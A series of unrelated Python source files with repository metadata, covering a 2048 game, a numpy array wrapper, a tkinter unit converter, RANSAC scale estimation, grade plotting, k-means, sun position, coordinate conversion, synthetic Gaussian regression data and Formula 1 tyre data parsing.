#if same elemnts are present consceutively then also game not over.
for i in range(3):
for j in range(3):
if mat[i][j]==mat[i+1][j] or mat[i][j]==mat[i][j+1]:
return 'GAME NOT OVER.'
#checking consecutive for the last row.
for j in range(3):
if mat[3][j]==mat[3][j+1]:
return 'GAME NOT OVER.'
#checking consecutive for lastcolumn
for i in range(3):
if mat[i][3]==mat[i+1][3]:
return 'GAME NOT OVER.'
#if nither is true then game lost.
return 'LOST'
#moving the non 0 elemnts left and 0 elements on right
def compress(mat):
changed=False
new_mat=[[0 for j in range(4)] for i in range(4)]
for i in range(4):
pos=0
for j in range(4):
if mat[i][j]!=0:
new_mat[i][pos]=mat[i][j]
#during the compress function the column index changes
if j!=pos:
changed=True
pos=pos+1
return new_mat,changed
#merging the similar elements
def merge(mat):
changed=False
for i in range(4):
for j in range(3):
#if values are added then change is happening
if mat[i][j] == mat[i][j+1] and mat[i][j]!=0:
mat[i][j]=mat[i][j]*2
mat[i][j+1]=0
changed=True
return mat,changed
#reverse a matrix
def reverse(mat):
rev_mat=[]
for i in range(4):
rev_mat.append(mat[i][::-1])
return rev_mat
#transpose of mat
def transpose(mat):
trans_mat=[[0 for j in range(4)] for i in range(4)]
for i in range(4):
for j in range(4):
trans_mat[i][j]=mat[j][i]
return trans_mat
def move_up(grid):
transpose_grid=transpose(grid)
new_grid,changed1=compress(transpose_grid)
new_grid,changed2=merge(new_grid)
changed=changed1 or changed2
new_grid,temp=compress(new_grid)
final_grid=transpose(new_grid)
return final_grid,changed
def move_down(grid):
transposed_grid=transpose(grid)
reversed_grid=reverse(transposed_grid)
new_grid,changed1=compress(reversed_grid)
new_grid,changed2=merge(new_grid)
changed=changed1 or changed2
new_grid,temp=compress(new_grid)
reversed_grid=reverse(new_grid)
final_grid=transpose(reversed_grid)
return final_grid,changed
def move_right(grid):
reversed_grid=reverse(grid)
new_grid,changed1=compress(reversed_grid)
new_grid,changed2=merge(new_grid)
changed=changed1 or changed2
new_grid,temp=compress(new_grid)
final_grid=reverse(new_grid)
return final_grid,changed
def move_left(grid):
new_grid,changed1=compress(grid)
#print(new_grid)
new_grid,changed2=merge(new_grid)
changed=changed1 or changed2
new_grid,temp=compress(new_grid)
return new_grid,changed | true |
ee761a12c29ebf2448076359b6c6f3ffdc58224b | Python | cofinoa/cfdm | /cfdm/core/data/numpyarray.py | UTF-8 | 2,439 | 2.96875 | 3 | [
"MIT"
] | permissive | from builtins import super
import numpy
from . import abstract
class NumpyArray(abstract.Array):
'''A container for a numpy array.
.. versionadded:: 1.7.0
'''
def __init__(self, array=None):
'''**Initialization**
:Parameters:
array: `numpy.ndarray`
The numpy array.
'''
super().__init__(array=array)
#--- End: def
@property
def dtype(self):
'''Data-type of the data elements.
.. versionadded:: 1.7.0
**Examples:**
>>> a.dtype
dtype('float64')
>>> print(type(a.dtype))
<type 'numpy.dtype'>
'''
return self._get_component('array').dtype
#--- End: def
@property
def ndim(self):
'''Number of array dimensions
.. versionadded:: 1.7.0
**Examples:**
>>> a.shape
(73, 96)
>>> a.ndim
2
>>> a.size
7008
>>> a.shape
(1, 1, 1)
>>> a.ndim
3
>>> a.size
1
>>> a.shape
()
>>> a.ndim
0
>>> a.size
1
'''
return self._get_component('array').ndim
#--- End: def
@property
def shape(self):
'''Tuple of array dimension sizes.
.. versionadded:: 1.7.0
**Examples:**
>>> a.shape
(73, 96)
>>> a.ndim
2
>>> a.size
7008
>>> a.shape
(1, 1, 1)
>>> a.ndim
3
>>> a.size
1
>>> a.shape
()
>>> a.ndim
0
>>> a.size
1
'''
return self._get_component('array').shape
#--- End: def
@property
def size(self):
'''Number of elements in the array.
.. versionadded:: 1.7.0
**Examples:**
>>> a.shape
(73, 96)
>>> a.size
7008
>>> a.ndim
2
>>> a.shape
(1, 1, 1)
>>> a.ndim
3
>>> a.size
1
>>> a.shape
()
>>> a.ndim
0
>>> a.size
1
'''
return self._get_component('array').size
#--- End: def
@property
def array(self):
'''Return an independent numpy array containing the data.
.. versionadded:: 1.7.0
:Returns:
`numpy.ndarray`
An independent numpy array of the data.
**Examples:**
>>> n = numpy.asanyarray(a)
>>> isinstance(n, numpy.ndarray)
True
'''
array = self._get_component('array')
if not array.ndim and numpy.ma.isMA(array):
# This is because numpy.ma.copy doesn't work for
# scalar arrays (at the moment, at least)
ma_array = numpy.ma.empty((), dtype=array.dtype)
ma_array[...] = array
array = ma_array
else:
array = array.copy()
return array
#--- End: def
#--- End: class
| true |
93ff28f109cf329e20b3b2adb759ade990a8756d | Python | Aashish2023/Hactoberfest2021 | /mile2km.py | UTF-8 | 871 | 3.1875 | 3 | [] | no_license | from tkinter import *
win = Tk()
win.minsize(300,200)
win.title("MILE TO KM CONVERTOR")
def mile2km(val):
km = int(val)*1.6
return round(km,2)
def click():
ques=mile_value.get()
ans= mile2km(ques)
ans_km.config(text=str(ans))
########################################################
isequaltext=Label(text="is equal to")
isequaltext.grid(column=0,row=2,padx=10,pady=10)
mile_value=Entry()
mile_value.grid(column=2,row=2,padx=5,pady=5)
topic_mile=Label(text="MILE")
topic_mile.grid(column=3,row=2)
topic_km=Label(text="KM")
topic_km.grid(column=3,row=3)
ans_km=Label(text="0",font=("Arial",20,"bold"))
ans_km.grid(column=2,row=3)
button=Button(text="Calculate",font=("Arial",20,"bold"),command=click)
button.grid(column=2,row=4)
#########################################################
win.mainloop() | true |
4366af2326389a926e103eb162486c1b3dbee784 | Python | YuLin1226/RANSAC | /Project_1/scale_registration.py | UTF-8 | 3,223 | 2.609375 | 3 | [] | no_license | import random
import numpy as np
import math
import matplotlib.pyplot as plt
def _cal_distance(x1, y1, x2, y2):
return ((x1-x2)**2 + (y1-y2)**2)**0.5
def _ransac_find_scale(pts_set_1, pts_set_2, sigma, max_iter=1000):
length, _ = np.shape(pts_set_1)
best_ratio = 0
total_inlier, pre_total_inlier = 0, 0
for i in range(max_iter):
index = random.sample(range(length), 2)
x11 = pts_set_1[index[0], 0]
y11 = pts_set_1[index[0], 1]
x12 = pts_set_1[index[1], 0]
y12 = pts_set_1[index[1], 1]
x21 = pts_set_2[index[0], 0]
y21 = pts_set_2[index[0], 1]
x22 = pts_set_2[index[1], 0]
y22 = pts_set_2[index[1], 1]
dist_1 = _cal_distance(x11, y11, x12, y12)
dist_2 = _cal_distance(x21, y21, x22, y22)
mean_1 = [(x11+x12)/2, (y11+y12)/2]
mean_2 = [(x21+x22)/2, (y21+y22)/2]
ratio = dist_1 / dist_2
for j in range(length):
x1j = pts_set_1[j,0]
y1j = pts_set_1[j,1]
x2j = pts_set_2[j,0]
y2j = pts_set_2[j,1]
dist_1_j = _cal_distance(mean_1[0], mean_1[1], x1j, y1j)
dist_2_j = _cal_distance(mean_2[0], mean_2[1], x2j, y2j)
ratio_j = dist_1_j / dist_2_j
if abs(ratio - ratio_j) < sigma:
total_inlier += 1
if total_inlier > pre_total_inlier:
pre_total_inlier = total_inlier
best_ratio = ratio
total_inlier = 0
return best_ratio
def _rot(theta):
x = theta / 180 * math.pi
T = np.array([
[math.cos(x), -math.sin(x)],
[math.sin(x), math.cos(x)]
])
return T
if __name__ == "__main__":
ratio = 3
n = 1000
times = 0
for j in range(n):
pts = []
uncertain = []
for i in range(30):
pts.append([
random.randint(1, 100),
random.randint(1, 100)
])
uncertain.append([
random.uniform(1.1, 5.4),
random.uniform(1.1, 5.4)
])
pts_np_1 = np.array(pts).T
uncertain_np = np.array(uncertain).T
pts_np_2 = _rot(30).dot(pts_np_1)*ratio + uncertain_np
noise_1, noise_2 = [], []
for i in range(20):
noise_1.append([
random.randint(1, 300),
random.randint(1, 300)
])
noise_2.append([
random.randint(1, 500),
random.randint(1, 500)
])
pts_np_1 = np.hstack((pts_np_1, np.array(noise_1).T))
pts_np_2 = np.hstack((pts_np_2, np.array(noise_2).T))
ratio_ransac = _ransac_find_scale(pts_set_1=pts_np_2.T, pts_set_2=pts_np_1.T, sigma=0.05, max_iter=100)
print("\nNumber %i Iteration: \n- answer: %f\n- solution: %f"%(j+1, ratio_ransac, ratio))
if abs(ratio - ratio_ransac) < 0.05*ratio:
times += 1
print("Success Percentage: %f " %(times/n*100))
# plt.scatter(pts_np_1[0,:], pts_np_1[1,:], c='red')
# plt.scatter(pts_np_2[0,:], pts_np_2[1,:], c='blue')
# plt.show() | true |
11c8f0cd37f1418c4c955b7abfb168bb06138e35 | Python | szekany/autograder_visualization | /first_submit_vs_final_grade_boxplot.py | UTF-8 | 3,766 | 2.90625 | 3 | [] | no_license | # Quick visualization of students first submissions vs final date produced by autograder.io
#
# EXAMPLE USAGE: python first_submit_vs_final_grade_boxplot.py -f project_scores.csv
#
# (c)Steve Zekany EECS 370 Winter 2020
import csv
import seaborn as sns
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import argparse
from util.datetime_z import parse_datetime
import datetime
import time
from textwrap import wrap
def make_histogram(filename, output_file, title):
df = pd.read_csv(filename)
# print(df) # uncomment to show dataframe
# dictionarize the dataframe
score_dict = pd.DataFrame.to_dict(df)
# find all unique student names
students = set(score_dict['Username 1'].values())
print('number of student names: ' + str(len(students))) # debugging
# get earliest date and max score for each student
score_table = pd.DataFrame(columns=['First Submission', 'First Submission DatetimeObj', 'Last Submission', 'Final Score'])
first_submission = df['Timestamp'].min()
last_submission = df['Timestamp'].max()
for student in students:
subs = df.loc[df['Username 1'] == student]
# print(subs['Timestamp'])
# print(subs.qindex['Timestamp', 0])
# print(subs['Timestamp'].min())
first_submit_time = subs['Timestamp'].min()
last_submit_time = subs['Timestamp'].max()
max_score = subs['Total'].max()
# print(type(first_submit_time))
# build date
first_date = parse_datetime(first_submit_time)
last_date = parse_datetime(first_submit_time)
# unixtime = time.mktime(date.timetuple())
# first_date_str = str('%04d'%first_date.year) + '-' + str('%02d'%first_date.month) + '-' + str('%02d'%first_date.day)
first_date_str = str('%02d'%first_date.month) + '-' + str('%02d'%first_date.day)
last_date_str = str(last_date.year) + '-' + str(last_date.month) + '-' + str(last_date.day)
# build the dataframe iteratively
score_table.loc[student] = pd.Series({'First Submission':first_date_str, 'First Submission DatetimeObj':first_submit_time, 'Last Submission':pd.to_datetime(last_date_str), 'Final Score':max_score})
# print(score_table)
sns.set(style="whitegrid")
# sorting dataframe
score_table.sort_values('First Submission', ascending=True, inplace=True)
# print(score_table)
# sns.regplot(x=score_table['First Submission DatetimeObj'], y=score_table['Final Score']);
# ax = sns.scatterplot(x=score_table['First Submission'], y=score_table['Final Score'], color=sns.xkcd_rgb["windows blue"])
ax = sns.boxplot(x=score_table['First Submission'], y=score_table['Final Score'])
# ax.set_title(title)
ax.set_title("\n".join(wrap(title, 60)))
ax.set_ylabel("Final Score", fontweight="bold")
ax.set_xlabel("Date of First Submission", fontweight="bold")
ax.grid(False)
# x_dates = score_table['First Submission'].dt.strftime('%Y-%m-%d').sort_values().unique()
# ax.set_xticklabels(labels=x_dates, rotation=45, ha='right')
# plt.xlim(first_submission, last_submission)
ax.set_xticklabels(ax.get_xticklabels(), rotation=90)
# ax.xaxis_date()
# ax.xaxis.set_major_formatter(mdates.DateFormatter('%m-%d'))
# fix layout
plt.tight_layout()
# plt.gcf().subplots_adjust(bottom=0.2)
# plt.show()
sns_plot = ax.get_figure()
sns_plot.savefig(fname=output_file)
if __name__ == "__main__":
#--- Setup Argument Parsing ---#
parser = argparse.ArgumentParser(prog='histogram_all',
description='Create a histogram of all final grades from the autograder.io csv')
parser.add_argument("-f", "--filename", dest="filename",
required=True, help='path to csv file from autograder.io')
args = parser.parse_args()
title = "Project 1a, Winter 2020 - Final score based on date of first submission to autograder.io"
make_histogram(args.filename, 'output.png', title)
| true |
dcb824aac825b17d4ab2899ea875959ab58db04a | Python | JongbinWoo/Intro-to-ml | /summer/lab5/lab.py | UTF-8 | 1,653 | 3 | 3 | [] | no_license | import numpy as np
import random
import pandas as pd
import matplotlib.pyplot as plt
def distance(M, data):
A = np.zeros((data.shape[0],M.shape[0]), dtype=np.float)
for i in range(data.shape[0]):
for j in range(M.shape[0]):
A[i,j] = np.linalg.norm(data[i] - M[j])
#B = np.argmin(A, axis=1)
return A
def labeling(A):
A = np.argmin(A, axis=1)
return A
def update(M,data,label):
for k in range(M.shape[0]):
j = 0
x1 = 0
x2 = 0
for i in range(data.shape[0]):
if (k == label[i]):
j += 1
x1 += data[i,0]
x2 += data[i,1]
M[k,0] = x1 / j
M[k,1] = x2 / j
return M
data_name = "./data_kmeans.txt"
columns = ['x1', 'x2']
data = pd.read_csv(data_name, names=columns, sep=' ')
data = data.as_matrix()
plt.plot(data[:,0],data[:,1],'ro')
plt.xlabel('x_1')
plt.ylabel('x_2')
plt.show()
plt.xlabel('x_1')
plt.ylabel('x_2')
plt.plot(data[:,0],data[:,1],'ro')
plt.plot(data[:,0],data[:,1],'ro')
plt.plot(data[label==0,0],data[label==0,1],'ro')
plt.plot(data[label==1,0],data[label==1,1],'bo')
plt.plot(data[label==2,0],data[label==2,1],'yo')
plt.plot(M[:,0], M[:,1], 'gx', label='Centroids')
test_data=np.array([[0.8, 1.2], [7., 5.],[1, 4]])
test_distance=distance(M, test_data)
test_label=labeling(test_distance)
plt.plot(test_data[test_label==0, 0], test_data[test_label==0, 1], "rx", label='Test')
plt.plot(test_data[test_label==1, 0], test_data[test_label==1, 1], "bx", label='Test')
plt.plot(test_data[test_label==2, 0], test_data[test_label==2, 1], "yx", label='Test')
plt.legend()
plt.show()
| true |
2833124bc799bf034406cdd21429278a68911ed2 | Python | danielvanpaass/Demonstrator | /Client/Angle.py | UTF-8 | 3,289 | 3.46875 | 3 | [
"MIT"
] | permissive | # Angle to sun calculation, azimuth TEST
import datetime
import math
import matplotlib.pyplot as plt
import numpy as np
year = 2019
# hour = pd.date_range(start=year, end='2020', freq='1h')
hoy = 1
def calc_sun_position(self, latitude_deg, longitude_deg, year, hoy):
"""
Calculates the Sun Position for a specific hour and location
:param latitude_deg: Geographical Latitude in Degrees
:type latitude_deg: float
:param longitude_deg: Geographical Longitude in Degrees
:type longitude_deg: float
:param year: year
:type year: int
:param hoy: Hour of the year from the start. The first hour of January is 1
:type hoy: int
:return: altitude, azimuth: Sun position in altitude and azimuth degrees [degrees]
:rtype: tuple
"""
# Convert to Radians
latitude_rad = math.radians(latitude_deg)
longitude_rad = math.radians(longitude_deg)
# Set the date in UTC based off the hour of year and the year itself
start_of_year = datetime.datetime(year, 1, 1, 0, 0, 0, 0)
utc_datetime = start_of_year + datetime.timedelta(hours=hoy)
# Angular distance of the sun north or south of the earths equator
# Determine the day of the year.
day_of_year = utc_datetime.timetuple().tm_yday
# Calculate the declination angle: The variation due to the earths tilt
# http://www.pveducation.org/pvcdrom/properties-of-sunlight/declination-angle
declination_rad = math.radians(
23.45 * math.sin((2 * math.pi / 365.0) * (day_of_year - 81)))
# Normalise the day to 2*pi
# There is some reason as to why it is 364 and not 365.26
angle_of_day = (day_of_year - 81) * (2 * math.pi / 364)
# The deviation between local standard time and true solar time
equation_of_time = (9.87 * math.sin(2 * angle_of_day)) - \
(7.53 * math.cos(angle_of_day)) - (1.5 * math.sin(angle_of_day))
# True Solar Time
solar_time = ((utc_datetime.hour * 60) + utc_datetime.minute +
(4 * longitude_deg) + equation_of_time) / 60.0
# Angle between the local longitude and longitude where the sun is at
# higher altitude
hour_angle_rad = math.radians(15 * (12 - solar_time))
# Altitude Position of the Sun in Radians
altitude_rad = math.asin(math.cos(latitude_rad) * math.cos(declination_rad) * math.cos(hour_angle_rad) +
math.sin(latitude_rad) * math.sin(declination_rad))
# Azimuth Position fo the sun in radians
azimuth_rad = math.asin(
math.cos(declination_rad) * math.sin(hour_angle_rad) / math.cos(altitude_rad))
# I don't really know what this code does, it has been imported from
# PySolar
if (math.cos(hour_angle_rad) >= (math.tan(declination_rad) / math.tan(latitude_rad))):
return math.degrees(altitude_rad), math.degrees(azimuth_rad)
else:
return math.degrees(altitude_rad), (180 - math.degrees(azimuth_rad))
self = np.arange(0,25)
latitude_deg = 52.0
longitude_deg = 4.3571
#for self in range(0,24): hoy = hoy + 1
# alt, azi = [calc_sun_position(self, 52.0, 4.3571, year, hoy)for self in range(0,24): hoy = hoy + 1]
print("Azimuth angle:", azi)
print("Altitude angle", alt)
plt.plot(hoy, azi)
plt.show()
| true |
14203fe5c1a2a51cc71f71664717e1e2f077dee0 | Python | ArthurVal/arthoolbox | /python/src/arthoolbox/localization/position.py | UTF-8 | 6,978 | 3.53125 | 4 | [
"MIT"
] | permissive | """Module use to define Position/Coordinate classes for Position handling
Classes list:
- Coordinate: Simple namespace use to store coordinates and conversions functions
- Position: Handle a postion (ie a coordinate and a frame_id)
"""
import copy, math, collections
from collections import namedtuple
class Coordinate(object):
"""Useless class use as namespace for the coordinates types
"""
Cartesian = collections.namedtuple(
'Cartesian',
['x', 'y', 'z']
)
Cylindrical = collections.namedtuple(
'Cylindrical',
['r', 'theta', 'z']
)
Spherical = collections.namedtuple(
'Spherical',
['rho', 'theta', 'phi']
)
def __cart_to_sphe(coord):
_rho = math.sqrt(math.fsum(map(math.pow, coord, (2,2,2))))
return Coordinate.Spherical(
rho = _rho,
theta = math.acos(coord.z / _rho),
phi = math.atan2(coord.y, coord.x),
)
Conversion = {
(Cartesian, Spherical): __cart_to_sphe,
(Cartesian, Cylindrical):
lambda coord: Coordinate.Cylindrical(
r = math.sqrt(math.pow(coord.x, 2) + math.pow(coord.y, 2)),
theta = math.atan2(coord.y, coord.x),
z = coord.z
),
(Cylindrical, Cartesian):
lambda coord: Coordinate.Cartesian(
x = coord.r * math.cos(coord.theta),
y = coord.r * math.sin(coord.theta),
z = coord.z
),
(Cylindrical, Spherical):
lambda coord: Coordinate.Spherical(
rho = math.sqrt(math.pow(coord.r, 2) + math.pow(coord.z, 2)),
theta = math.atan(coord.r / coord.z),
phi = coord.theta,
),
(Spherical, Cartesian):
lambda coord: Coordinate.Cartesian(
x = coord.rho * math.sin(coord.theta) * math.cos(coord.phi),
y = coord.rho * math.sin(coord.theta) * math.sin(coord.phi),
z = coord.rho * math.cos(coord.theta)
),
(Spherical, Cylindrical):
lambda coord: Coordinate.Cylindrical(
r = coord.rho * math.sin(coord.theta),
theta = coord.phi,
z = coord.rho * math.cos(coord.theta),
),
}
Availables = frozenset(
(Cartesian, Cylindrical, Spherical)
)
@staticmethod
def convert(coordinate, to_type):
"""Static function to convert from one coordinate system to an other
Parameters
----------
coordinate: Coordinate.Cartesian() or Coordinate.Polar() or ...
An instance of one of the coordinate system listed above
to_type: Coordinate.Cartesian or Coordinate.Polar or ...
The targeted type to convert in
Raises
------
AttributeError
When type(coordinate) or to_type are not contained in Availables
or when the conversion function doesn't exist
"""
if type(coordinate) not in Coordinate.Availables:
raise AttributeError(
"Unknow coordinate system {}".format(type(coordinate))
)
if to_type not in Coordinate.Availables:
raise AttributeError(
"Unknow new coordinate system {}".format(to_type)
)
conversion_key = (type(coordinate), to_type)
if conversion_key not in Coordinate.Conversion:
raise AttributeError(
"Unknow conversion from {} to {}".format(*conversion_key)
)
return Coordinate.Conversion[conversion_key](coordinate)
class Position(object):
"""Class use to represent position, i.e. coordinate + frame
TODO: Frame_id conversion Tree
Attributs
---------
frame_id: str
The frame ID this position is assioted with
"""
Repr = namedtuple(
'Position',
['frame_id', 'coordinate']
)
def __init__(self, initial_coordinates, frame_id = None):
"""Initialize the position
Parameters
----------
initial_coordinates: Coordinate
frame_id: str
Represent the frame this position is associted with
"""
self.__coordinates = [
getattr(initial_coordinates, coordinate_name, 0)
for coordinate_name in initial_coordinates._fields
]
self.__coordinate_type = type(initial_coordinates)
self.__frame_id = frame_id
@property
def frame_id(self):
return self.__frame_id
@property
def type(self):
return self.__coordinate_type
def get(self):
"""Return the current Position as namedtuple (immutable)
Returns
-------
namedtuple
A tuple containing the current position coordinate
"""
return self.__coordinate_type(
self.__coordinates[0],
self.__coordinates[1],
self.__coordinates[2],
)
def set(self, new_coordinate):
"""Set the new position
Parameters
----------
new_coordinate: Position or Position.Coordinate
The new position coordinate
Raises
------
AttributeError
When the new_coordinate tuple is not convertible to current coords
"""
if isinstance(new_coordinate, Position):
self.update_from_position(new_coordinate)
else:
self.__coordinates = list(
new_coordinate if type(new_coordinate) == self.__coordinate_type
else Coordinate.convert(
new_coordinate,
to_type = self.__coordinate_type
)
)
def update_from_position(self, position, overwrite_frame_id = False):
"""Update the current object position with respect to new position
Parameters
----------
from_position: Position
The new position to update our coordinate with
overwrite_frame_id: bool
Indicate if we wish to overwrite our frame_id with from_position
"""
# NOTE: This is questionnable, does-it have any sense to overwrite a
# frame_id ? Objects shouldn't change their frame_id
if overwrite_frame_id:
self.__frame_id = copy.copy(position.frame_id)
if position.frame_id == self.frame_id:
# Simply copy the coordinates
self.set(position.get())
else:
# TODO: Find the from_position coordinate within our frame_id
raise NotImplementedError(
("Currently unable to update a Position from an other"
" Position not within the same frame_id")
)
def __repr__(self):
"""String representation of a Position
"""
return str(
Position.Repr(
frame_id = self.frame_id,
coordinate = self.get(),
)
)
| true |
7bf5daa4c930b179431d83f8372d36f974cb0784 | Python | guillerova/SpainAI_2020_Series_Temporales | /general_utils.py | UTF-8 | 1,065 | 2.546875 | 3 | [] | no_license | import pandas as pd
def _fix_weights(weights):
suma_weights = sum(weights.values())
if suma_weights < 1.0:
# print(sum(weights.values()))
max_weight_asset = list(sorted(weights, key=weights.get, reverse=True))[0]
falta = 1 - suma_weights
weights[max_weight_asset] += falta
# print(sum(weights.values()))
assert sum(weights.values()) == 1.0
return weights
elif suma_weights > 1.0:
max_weight_asset = list(sorted(weights, key=weights.get, reverse=True))[0]
sobra = suma_weights - 1
weights[max_weight_asset] -= sobra
assert sum(weights.values()) == 1.0
assert all([v > 0 for v in weights.values()])
return weights
def get_submission_markowitz(weights, assets):
weights = _fix_weights(weights)
subm_plantilla = pd.read_csv("./submission/submission.csv")
date = subm_plantilla["eod_ts"]
cols = {
f"allo_{asset}": [weights[f"{asset}_close"]] * len(date) for asset in assets
}
return pd.DataFrame({"eod_ts": date, **cols})
| true |
4bd59367690b852f9bf9fa4138bf020b9c59157d | Python | r39ashmi/LastMileRoutingResearchChallenge | /src/utils/models/adjacency_encoder.py | UTF-8 | 1,532 | 2.78125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 28 09:43:48 2021
@author: Rashmi Kethireddy
"""
import numpy as np
import torch.nn as nn
from torch.nn import functional as F
import torch
torch.manual_seed(400)
class SpectralRule(nn.Module):
def __init__(self, in_units, out_units, **kwargs):
super().__init__(**kwargs)
self.in_units, self.out_units = in_units, out_units
self.lin1=nn.Linear(self.in_units, self.out_units)
def forward(self,A, X):
I = torch.eye(*A.shape[1:2])
A_hat = A + I
D = torch.sum(A_hat, axis=0)
D_inv = D**-0.5
D_inv = torch.diag(D_inv)
A_hat = torch.tensor(D_inv * A_hat * D_inv,dtype=torch.float32)
aggregate =torch.matmul(A_hat,X.t())
propagate = F.relu(self.lin1(aggregate))
return propagate
'''
def temp(A,X):
I = torch.eye(*A.shape)
A_hat = A.copy() + I
A=A_hat * X
D = np.array(np.sum(A, axis=0))[0]
D = np.matrix(np.diag(D))
D**-1 * A
'''
def main():
#Intialize dummy A
#Run the code for testing
A=torch.tensor(np.matrix([
[0, 1, 0, 0],
[0, 0, 1, 1],
[0, 1, 0, 0],
[1, 0, 1, 0]],
dtype=float
))
X=torch.tensor([
[ 0., 0.],
[ 1., -1.],
[ 2., -2.],
[ 3., -3.]
])
sr_model=SpectralRule(4,2)
pr=sr_model(A,X)
print(pr)
if __name__=='__main__':
main()
| true |
763ab48775b53a33fc2e1c0e88d44ae49cc751e4 | Python | jakelevi1996/backprop2 | /data/guassian_curve.py | UTF-8 | 3,033 | 2.90625 | 3 | [] | no_license | import numpy as np
from data.regression import Regression
def _noisy_gaussian(
x,
input_offset,
input_scale,
output_offset,
output_scale,
noise_std,
output_dim,
):
x_affine_transformed = np.dot(input_scale, x - input_offset)
y_pre_affine_transformation = (
np.exp(-np.square(x_affine_transformed).sum(axis=0))
)
noisy_offset = np.random.normal(
loc=output_offset,
scale=noise_std,
size=[output_dim, x.shape[1]],
)
y = (y_pre_affine_transformation * output_scale) + noisy_offset
return y
class GaussianCurve(Regression):
def __init__(
self,
input_dim=1,
output_dim=1,
n_train=None,
n_test=None,
x_lo=-2,
x_hi=2,
noise_std=0.1,
input_offset=None,
input_scale=None,
output_offset=None,
output_scale=None,
x_train=None,
x_test=None,
):
""" Initialise a GaussianCurve object """
Regression.__init__(self)
# Set shape constants and unspecified parameters
self.set_shape_constants(input_dim, output_dim, n_train, n_test)
if input_offset is None:
input_offset = np.random.normal(size=[input_dim, 1])
if input_scale is None:
input_scale = np.random.normal(size=[input_dim, input_dim])
if output_offset is None:
output_offset = np.random.normal(size=[output_dim, 1])
if output_scale is None:
output_scale = np.random.normal(scale=5, size=[output_dim, 1])
# Generate input/output training and test data
if x_train is None:
self.train.x = np.random.uniform(
x_lo,
x_hi,
size=[input_dim, self.train.n],
)
else:
self.train.x = x_train
if x_test is None:
self.test.x = np.random.uniform(
x_lo,
x_hi,
size=[input_dim, self.test.n],
)
else:
self.test.x = x_test
self.train.y = _noisy_gaussian(
self.train.x,
input_offset,
input_scale,
output_offset,
output_scale,
noise_std,
output_dim,
)
self.test.y = _noisy_gaussian(
self.test.x,
input_offset,
input_scale,
output_offset,
output_scale,
noise_std,
output_dim,
)
class SumOfGaussianCurves(Regression):
def __init__(self, *args, n_components=4, **kwargs):
assert ("x_train" not in kwargs) and ("x_test" not in kwargs)
GaussianCurve.__init__(self, *args, **kwargs)
for _ in range(n_components - 1):
g = GaussianCurve(
*args,
**kwargs,
x_train=self.train.x,
x_test=self.test.x,
)
self.train.y += g.train.y
self.test.y += g.test.y
| true |
554d92888f7c3c0bf55c3e76586b69749128a5f6 | Python | darklatiz/MathematicsForML | /intro/coursera/test/week2_assesment.py | UTF-8 | 1,290 | 3.96875 | 4 | [] | no_license | from intro.coursera.vectors import Vector
'''
A ship travels with velocity given by [1,2], with current flowing
in the direction given by [1,1] with respect to some co-ordinate axes.
What is the velocity of the ship in the direction of the current?
A. The projection of the velocity into the current vector
'''
r = Vector([1,2])
s = Vector([1,1])
print("Projection of s onto r = {0}".format(s.scalar_projection(r)))
print("The Vector Projection of s onto r = {0}".format(s.vector_projection(r)))
'''
A ball travels with velocity given by [2,1],
with wind blowing in the direction given by [3,−4] with respect to some co-ordinate axes.
What is the size of the velocity of the ball in the direction of the wind?
'''
ballVector = Vector([2,1])
windDirection = Vector([3,-4])
print("Projection of s onto r = {0}".format(ballVector.scalar_projection(windDirection)))
'''
Given vectors v=[−4,−3,8], b1=[1,2,3], b2=[−2,1,0] and b3=−3,−6,5] all written in the standard basis,
what is v in the basis defined by b1, b2 and b3?
You are given that b1, b2 and b3 are all pairwise orthogonal to each other.
'''
b1 = Vector([1,2,3])
b2 = Vector([-2,1,0])
b3 = Vector([-3,-6,5])
r = Vector([-4,-3,8])
nev = r.basis_change(b1, b2, b3)
print("Change Basis exercise: {0}".format(nev))
| true |
d7d9169220b404d81242691085c1cc05766c6c45 | Python | lgt494371725/leetcode | /十进制转二进制.py | UTF-8 | 210 | 3.375 | 3 | [] | no_license |
temp=[]
def binary(decimal):
result=''
while decimal:
a=decimal%2
decimal//=2
temp.append(a)
while temp:
result+=str(temp.pop())
return result
print(binary(10))
| true |
917684c32c255524405ac5dc09e64c5f6a578790 | Python | carolsgit/python | /抓取网页字符串.py | UTF-8 | 458 | 3.15625 | 3 | [] | no_license | import urllib.request
def lookinfo():
page=urllib.request.urlopen("http://www.lookinfo.com.cn/do/alonepage.php?id=2") #urllib.request.urlopen抓取网页
text=page.read().decode("gb2312") #抓取内容赋值给text,并转码成gb2312格式便于阅读
# a=text[3000:3500] #抓取text中3000到3500之前的内容赋值给a
start=text.find("海南")
end=start+12
name=text[start:end]
print(name)
print(lookinfo())
| true |
114e3222c546687ea1c5e3eeae9ebda3e59656aa | Python | paulRarity/python1 | /strings.py | UTF-8 | 270 | 3.140625 | 3 | [] | no_license | course = "python for beginner"
print(course[3])
course = "python for beginner"
print(course[:])
study = "ky su"
print(len(study))
print(course.replace("p","Q"))
print(course.replace(course,study))
print(course.upper())
print(course.find("p"))
print("python" in course) | true |
ab815f5b89156be9459819dfb0aeef8c7bfd1741 | Python | SheldonGrant/f1-tires | /scripts/f1_scripts.py | UTF-8 | 6,898 | 2.640625 | 3 | [] | no_license | import pandas as pd
import numpy as np
import datetime
import os
from collections import defaultdict
def assign_lap(df):
df['LAP'] = 1
cols = ['NO', 'GAP', 'TIME', 'LAP']
drivers = df[0].unique()
data = df.values
for driver in drivers:
data[data[:,0] == driver, 3] = data[data[:,0] == driver, 3].cumsum()
return pd.DataFrame(data=data, columns=cols)
def convert_time(arr):
arr = arr.apply(lambda x: x.strip())
arr = arr.apply(lambda x: datetime.datetime.strptime(x,'%M:%S.%f'))
timedelta = arr - datetime.datetime.strptime('00:00.0','%M:%S.%f')
secs = timedelta.apply(lambda x: x / np.timedelta64(1, 's'))
return secs
def get_tires(df):
arr = df.values
all_strategies = []
for row in arr:
strategy = [row[0]]
for item in row[1:]:
try:
tire, laps = item.split()
laps = int(laps.replace('(', '').replace(')', ''))
stint = []
for i in xrange(laps):
stint.append(tire)
strategy.extend(stint)
except:
pass
all_strategies.append(strategy)
df = pd.DataFrame(data=all_strategies)
column_names = ['NAME']
column_names.extend([i for i in xrange(1, df.shape[1])])
df.columns = column_names
return df
def get_sector_times(df):
rows = df.shape[0] / 3
sector1, others = df.iloc[:22, :], df.iloc[22:, :]
sector2, sector3 = others.iloc[:rows, :], others.iloc[rows:, :]
all_sectors = pd.merge(sector2, sector3, on=[0, 1])
